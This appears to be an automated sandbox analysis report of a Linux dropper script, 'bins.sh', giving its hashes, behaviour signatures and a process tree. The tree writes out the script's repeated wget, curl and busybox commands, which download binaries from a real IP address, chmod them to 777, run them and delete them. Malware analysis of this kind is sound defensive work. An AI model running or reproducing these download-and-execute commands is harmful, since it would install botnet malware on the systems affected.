Analysis
-
max time kernel
30s -
max time network
130s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
04-11-2024 04:02
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
3974491d00b9582e0258135c610a9421
-
SHA1
ecc37a0827534c2c0481e0612cd6df3fc19cf86e
-
SHA256
6bfa6f703269861e72d2adaf8105b6e76da66084c6242ca779b0a88fba559328
-
SHA512
7ede6a7178e143e32559bf9d3d51f2a6ab740c5e865bac2d7a173aef231ba0856edd270e2d8cada9440d33606071b1b89fda997c11b31fe7121618274641b57a
-
SSDEEP
192:hZC8+oCsQQl95VnaK4St9bi6I7HDvb5k8h74i6I7H/0vb5k8EC8+oCsQQHZ5VnaZ:hZhVrQQlSSnCvb5k8h790vb5k8EhVrQZ
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodpid Process 1599 chmod 1563 chmod 1545 chmod 1569 chmod 1587 chmod 1514 chmod 1539 chmod 1520 chmod 1593 chmod 1617 chmod 1623 chmod 1629 chmod 1551 chmod 1654 chmod 1666 chmod 1526 chmod 1532 chmod 1581 chmod 1636 chmod 1674 chmod 1508 chmod 1648 chmod 1557 chmod 1605 chmod 1611 chmod 1642 chmod 1660 chmod 1575 chmod -
Executes dropped EXE 28 IoCs
Processes:
Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTEEGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYdNkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfiv2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PBMQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRUQLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY1xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni5xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0RYkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC2013LziPPOU64KElhsy06VSGNerH5jNdigllb9hjKgLiksrxr40vGLawuxTS92IUqQec3RYkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni5xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0Rb9hjKgLiksrxr40vGLawuxTS92IUqQec3R1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC2013LziPPOU64KElhsy06VSGNerH5jNdigll0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PBIx6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTEEGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYdNkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfiv2saiQIFq9K1TWRSrfvBqfdoJEY362VGsAxqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhzMQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRUQLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY1ioc pid Process /tmp/Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE 1509 Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE /tmp/EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd 1515 EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd /tmp/NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi 1521 NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi /tmp/v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA 1527 v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA /tmp/0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB 1533 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB /tmp/MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU 1540 MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU /tmp/QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY1 1546 QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY1 /tmp/xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz 1552 xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz /tmp/4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni5 1558 4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni5 /tmp/xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R 1564 xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R /tmp/YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj 1570 YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj /tmp/1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC20 1576 1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC20 /tmp/13LziPPOU64KElhsy06VSGNerH5jNdigll 1582 13LziPPOU64KElhsy06VSGNerH5jNdigll /tmp/b9hjKgLiksrxr40vGLawuxTS92IUqQec3R 1588 b9hjKgLiksrxr40vGLawuxTS92IUqQec3R /tmp/YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj 1594 YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj /tmp/4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni5 1600 4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni5 /tmp/xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R 1606 xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R /tmp/b9hjKgLiksrxr40vGLawuxTS92IUqQec3R 1612 b9hjKgLiksrxr40vGLawuxTS92IUqQec3R /tmp/1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC20 1618 1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC20 /tmp/13LziPPOU64KElhsy06VSGNerH5jNdigll 1624 13LziPPOU64KElhsy06VSGNerH5jNdigll /tmp/0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB 1630 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB /tmp/Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE 1637 Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE /tmp/EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd 1643 EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd /tmp/NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi 1649 NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi /tmp/v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA 1655 v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA /tmp/xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz 1661 xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz /tmp/MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU 1667 MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU /tmp/QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY1 1675 QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY1 -
System Network Configuration Discovery 1 TTPs 10 IoCs
Adversaries may gather information about the network configuration of a system.
Processes:
rmwgetcurlrm13LziPPOU64KElhsy06VSGNerH5jNdigllbusyboxbusybox13LziPPOU64KElhsy06VSGNerH5jNdigllwgetcurlpid Process 1625 rm 1578 wget 1579 curl 1583 rm 1624 13LziPPOU64KElhsy06VSGNerH5jNdigll 1622 busybox 1580 busybox 1582 13LziPPOU64KElhsy06VSGNerH5jNdigll 1620 wget 1621 curl -
Writes file to tmp directory 32 IoCs
Malware often drops required files in the /tmp directory.
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlbusyboxcurlbusyboxcurlcurlwgetcurlcurlwgetcurlcurlcurlcurldescription ioc Process File opened for modification /tmp/YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj curl File opened for modification /tmp/1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC20 curl File opened for modification /tmp/0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB curl File opened for modification /tmp/MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU curl File opened for modification /tmp/NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi curl File opened for modification /tmp/v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA curl File opened for modification /tmp/1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC20 curl File opened for modification /tmp/13LziPPOU64KElhsy06VSGNerH5jNdigll curl File opened for modification /tmp/13LziPPOU64KElhsy06VSGNerH5jNdigll curl File opened for modification /tmp/EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd curl File opened for modification /tmp/MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU curl File opened for modification /tmp/xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R curl File opened for modification /tmp/4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni5 curl File opened for modification /tmp/xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R curl File opened for modification /tmp/QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY1 curl File opened for modification /tmp/Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE curl File opened for modification /tmp/QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY1 curl File opened for modification /tmp/4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni5 curl File opened for modification /tmp/b9hjKgLiksrxr40vGLawuxTS92IUqQec3R curl File opened for modification /tmp/0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB busybox File opened for modification /tmp/Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE curl File opened for modification /tmp/0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB busybox File opened for modification /tmp/YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj curl File opened for modification /tmp/NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi curl File opened for modification /tmp/0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB wget File opened for modification /tmp/xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz curl File opened for modification /tmp/0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB curl File opened for modification /tmp/0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB wget File opened for modification /tmp/EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd curl File opened for modification /tmp/b9hjKgLiksrxr40vGLawuxTS92IUqQec3R curl File opened for modification /tmp/v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA curl File opened for modification /tmp/xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz curl
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:1500
-
/bin/rm/bin/rm bins.sh2⤵PID:1501
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE2⤵PID:1502
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE2⤵
- Writes file to tmp directory
PID:1506
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE2⤵PID:1507
-
-
/bin/chmodchmod 777 Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE2⤵
- File and Directory Permissions Modification
PID:1508
-
-
/tmp/Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE./Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE2⤵
- Executes dropped EXE
PID:1509
-
-
/bin/rmrm Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE2⤵PID:1510
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd2⤵PID:1511
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd2⤵
- Writes file to tmp directory
PID:1512
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd2⤵PID:1513
-
-
/bin/chmodchmod 777 EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd2⤵
- File and Directory Permissions Modification
PID:1514
-
-
/tmp/EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd./EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd2⤵
- Executes dropped EXE
PID:1515
-
-
/bin/rmrm EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd2⤵PID:1516
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi2⤵PID:1517
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi2⤵
- Writes file to tmp directory
PID:1518
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi2⤵PID:1519
-
-
/bin/chmodchmod 777 NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi2⤵
- File and Directory Permissions Modification
PID:1520
-
-
/tmp/NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi./NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi2⤵
- Executes dropped EXE
PID:1521
-
-
/bin/rmrm NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi2⤵PID:1522
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA2⤵PID:1523
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA2⤵
- Writes file to tmp directory
PID:1524
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA2⤵PID:1525
-
-
/bin/chmodchmod 777 v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA2⤵
- File and Directory Permissions Modification
PID:1526
-
-
/tmp/v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA./v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA2⤵
- Executes dropped EXE
PID:1527
-
-
/bin/rmrm v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA2⤵PID:1528
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB2⤵
- Writes file to tmp directory
PID:1529
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB2⤵
- Writes file to tmp directory
PID:1530
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB2⤵
- Writes file to tmp directory
PID:1531
-
-
/bin/chmodchmod 777 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB2⤵
- File and Directory Permissions Modification
PID:1532
-
-
/tmp/0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB./0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB2⤵
- Executes dropped EXE
PID:1533
-
-
/bin/rmrm 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB2⤵PID:1535
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU2⤵PID:1536
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU2⤵
- Writes file to tmp directory
PID:1537
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU2⤵PID:1538
-
-
/bin/chmodchmod 777 MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU2⤵
- File and Directory Permissions Modification
PID:1539
-
-
/tmp/MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU./MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU2⤵
- Executes dropped EXE
PID:1540
-
-
/bin/rmrm MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU2⤵PID:1541
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY12⤵PID:1542
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY12⤵
- Writes file to tmp directory
PID:1543
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY12⤵PID:1544
-
-
/bin/chmodchmod 777 QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY12⤵
- File and Directory Permissions Modification
PID:1545
-
-
/tmp/QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY1./QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY12⤵
- Executes dropped EXE
PID:1546
-
-
/bin/rmrm QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY12⤵PID:1547
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz2⤵PID:1548
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz2⤵
- Writes file to tmp directory
PID:1549
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz2⤵PID:1550
-
-
/bin/chmodchmod 777 xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz2⤵
- File and Directory Permissions Modification
PID:1551
-
-
/tmp/xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz./xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz2⤵
- Executes dropped EXE
PID:1552
-
-
/bin/rmrm xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz2⤵PID:1553
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni52⤵PID:1554
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni52⤵
- Writes file to tmp directory
PID:1555
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni52⤵PID:1556
-
-
/bin/chmodchmod 777 4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni52⤵
- File and Directory Permissions Modification
PID:1557
-
-
/tmp/4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni5./4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni52⤵
- Executes dropped EXE
PID:1558
-
-
/bin/rmrm 4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni52⤵PID:1559
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R2⤵PID:1560
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R2⤵
- Writes file to tmp directory
PID:1561
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R2⤵PID:1562
-
-
/bin/chmodchmod 777 xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R2⤵
- File and Directory Permissions Modification
PID:1563
-
-
/tmp/xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R./xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R2⤵
- Executes dropped EXE
PID:1564
-
-
/bin/rmrm xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R2⤵PID:1565
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj2⤵PID:1566
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj2⤵
- Writes file to tmp directory
PID:1567
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj2⤵PID:1568
-
-
/bin/chmodchmod 777 YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj2⤵
- File and Directory Permissions Modification
PID:1569
-
-
/tmp/YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj./YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj2⤵
- Executes dropped EXE
PID:1570
-
-
/bin/rmrm YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj2⤵PID:1571
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC202⤵PID:1572
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC202⤵
- Writes file to tmp directory
PID:1573
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC202⤵PID:1574
-
-
/bin/chmodchmod 777 1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC202⤵
- File and Directory Permissions Modification
PID:1575
-
-
/tmp/1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC20./1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC202⤵
- Executes dropped EXE
PID:1576
-
-
/bin/rmrm 1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC202⤵PID:1577
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/13LziPPOU64KElhsy06VSGNerH5jNdigll2⤵
- System Network Configuration Discovery
PID:1578
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/13LziPPOU64KElhsy06VSGNerH5jNdigll2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1579
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/13LziPPOU64KElhsy06VSGNerH5jNdigll2⤵
- System Network Configuration Discovery
PID:1580
-
-
/bin/chmodchmod 777 13LziPPOU64KElhsy06VSGNerH5jNdigll2⤵
- File and Directory Permissions Modification
PID:1581
-
-
/tmp/13LziPPOU64KElhsy06VSGNerH5jNdigll./13LziPPOU64KElhsy06VSGNerH5jNdigll2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:1582
-
-
/bin/rmrm 13LziPPOU64KElhsy06VSGNerH5jNdigll2⤵
- System Network Configuration Discovery
PID:1583
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/b9hjKgLiksrxr40vGLawuxTS92IUqQec3R2⤵PID:1584
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/b9hjKgLiksrxr40vGLawuxTS92IUqQec3R2⤵
- Writes file to tmp directory
PID:1585
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/b9hjKgLiksrxr40vGLawuxTS92IUqQec3R2⤵PID:1586
-
-
/bin/chmodchmod 777 b9hjKgLiksrxr40vGLawuxTS92IUqQec3R2⤵
- File and Directory Permissions Modification
PID:1587
-
-
/tmp/b9hjKgLiksrxr40vGLawuxTS92IUqQec3R./b9hjKgLiksrxr40vGLawuxTS92IUqQec3R2⤵
- Executes dropped EXE
PID:1588
-
-
/bin/rmrm b9hjKgLiksrxr40vGLawuxTS92IUqQec3R2⤵PID:1589
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj2⤵PID:1590
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj2⤵
- Writes file to tmp directory
PID:1591
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj2⤵PID:1592
-
-
/bin/chmodchmod 777 YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj2⤵
- File and Directory Permissions Modification
PID:1593
-
-
/tmp/YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj./YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj2⤵
- Executes dropped EXE
PID:1594
-
-
/bin/rmrm YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj2⤵PID:1595
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni52⤵PID:1596
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni52⤵
- Writes file to tmp directory
PID:1597
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni52⤵PID:1598
-
-
/bin/chmodchmod 777 4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni52⤵
- File and Directory Permissions Modification
PID:1599
-
-
/tmp/4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni5./4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni52⤵
- Executes dropped EXE
PID:1600
-
-
/bin/rmrm 4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni52⤵PID:1601
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R2⤵PID:1602
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R2⤵
- Writes file to tmp directory
PID:1603
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R2⤵PID:1604
-
-
/bin/chmodchmod 777 xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R2⤵
- File and Directory Permissions Modification
PID:1605
-
-
/tmp/xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R./xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R2⤵
- Executes dropped EXE
PID:1606
-
-
/bin/rmrm xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R2⤵PID:1607
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/b9hjKgLiksrxr40vGLawuxTS92IUqQec3R2⤵PID:1608
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/b9hjKgLiksrxr40vGLawuxTS92IUqQec3R2⤵
- Writes file to tmp directory
PID:1609
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/b9hjKgLiksrxr40vGLawuxTS92IUqQec3R2⤵PID:1610
-
-
/bin/chmodchmod 777 b9hjKgLiksrxr40vGLawuxTS92IUqQec3R2⤵
- File and Directory Permissions Modification
PID:1611
-
-
/tmp/b9hjKgLiksrxr40vGLawuxTS92IUqQec3R./b9hjKgLiksrxr40vGLawuxTS92IUqQec3R2⤵
- Executes dropped EXE
PID:1612
-
-
/bin/rmrm b9hjKgLiksrxr40vGLawuxTS92IUqQec3R2⤵PID:1613
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC202⤵PID:1614
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC202⤵
- Writes file to tmp directory
PID:1615
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC202⤵PID:1616
-
-
/bin/chmodchmod 777 1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC202⤵
- File and Directory Permissions Modification
PID:1617
-
-
/tmp/1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC20./1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC202⤵
- Executes dropped EXE
PID:1618
-
-
/bin/rmrm 1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC202⤵PID:1619
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/13LziPPOU64KElhsy06VSGNerH5jNdigll2⤵
- System Network Configuration Discovery
PID:1620
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/13LziPPOU64KElhsy06VSGNerH5jNdigll2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1621
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/13LziPPOU64KElhsy06VSGNerH5jNdigll2⤵
- System Network Configuration Discovery
PID:1622
-
-
/bin/chmodchmod 777 13LziPPOU64KElhsy06VSGNerH5jNdigll2⤵
